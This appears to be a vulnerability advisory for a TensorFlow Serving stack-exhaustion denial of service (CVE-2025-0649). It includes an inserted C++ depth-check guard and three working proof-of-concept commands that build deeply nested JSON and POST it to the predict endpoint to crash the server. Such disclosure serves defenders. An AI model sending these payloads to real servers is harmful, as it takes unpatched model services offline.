
Tensorflow Serving Stack Exhaustion DoS

CVE-2025-0649 | CVSS 8.9

JFrog Severity: High

Discovered by Ori Hollander of the JFrog Security Research Team

Published 6 May, 2025 | Last updated 6 May, 2025

This vulnerability allows unauthenticated remote attackers to cause the server to stop responding to requests, due to stack exhaustion when parsing malformed JSON input.

Affected: Tensorflow Serving (, 2.17.0]

TensorFlow Serving uses RapidJSON to process JSON input. The function ParseJson in json-tensor.cc uses RapidJSON’s ParseStream function to parse the JSON input. The default behavior of RapidJSON’s parsing function is [to parse the input recursively](https://rapidjson.org/md_doc_features.html#Parsing:~:text=Parsing-,Recursive%20(default),-and%20iterative%20parser), with no limit on the recursion depth. A malicious JSON string containing arrays or objects nested deeply inside one another can therefore cause the server to crash.
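As an added example (not code from the advisory or from TensorFlow Serving), the following C++ guard bounds nesting depth before a request body reaches a recursive parser such as RapidJSON’s ParseStream; the names `CheckJsonDepth` and `NestedInstances` and the limit of 128 are my assumptions. Unlike a naive bracket count, it ignores brackets inside string literals and stops scanning as soon as the limit is exceeded.

```cpp
// Added example (not TensorFlow Serving or JFrog code): an iterative
// pre-parse guard that bounds JSON nesting depth before the input is
// handed to a recursive parser. It walks the bytes once, skipping brackets
// inside string literals, and runs in O(n) time with O(1) extra memory, so
// it cannot itself be exhausted by deep nesting.
#include <cstddef>
#include <string>

// Result of the depth scan.
struct DepthCheck {
    size_t max_depth;     // deepest nesting observed (capped at limit + 1)
    bool   within_limit;  // false if nesting exceeded the limit
};

// Return whether the array/object nesting of json stays at or below
// max_depth. Escaped quotes inside strings are honoured.
DepthCheck CheckJsonDepth(const std::string& json, size_t max_depth) {
    size_t depth = 0, deepest = 0;
    bool in_string = false, escaped = false;
    for (char c : json) {
        if (in_string) {
            if (escaped)        escaped = false;
            else if (c == '\\') escaped = true;
            else if (c == '"')  in_string = false;
            continue;
        }
        switch (c) {
            case '"': in_string = true; break;
            case '[': case '{':
                if (++depth > deepest) deepest = depth;
                if (depth > max_depth) return {depth, false};  // reject early
                break;
            case ']': case '}':
                if (depth > 0) --depth;  // unbalanced closers are left to the parser
                break;
            default: break;
        }
    }
    return {deepest, true};
}

// Constructed input in the shape of the advisory's third proof of concept
// (assumed helper): n nested arrays inside "instances".
std::string NestedInstances(size_t n) {
    return "{\"instances\":" + std::string(n, '[') + "1" + std::string(n, ']') + "}";
}
```

Placing such a check in front of ParseStream turns the deeply nested payloads into an ordinary 4xx rejection instead of a crash.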

Run TensorFlow Serving using the instructions in the page: https://www.tensorflow.org/tfx/serving/docker.

Then run any of the following command pairs in a shell (each writes the payload to a file and POSTs it to the REST endpoint):

  1. 500,000 nested empty arrays as the value of `signature_name`:

         python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 500000 + "]" * 500000 + "}")' > /tmp/malicious.txt
         curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict

  2. 50,000 nested empty arrays as the value of `signature_name`:

         python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 50000 + "]" * 50000 + "}")' > /tmp/malicious.txt
         curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict

  3. 50,000 nested arrays around a single value in `instances`:

         python -c 'print("{\"instances\":" + "[" * 50000 + "1" + "]" * 50000 + "}")' > /tmp/malicious.txt
         curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict

The server will crash.

No mitigations are supplied for this issue.

Fix commit
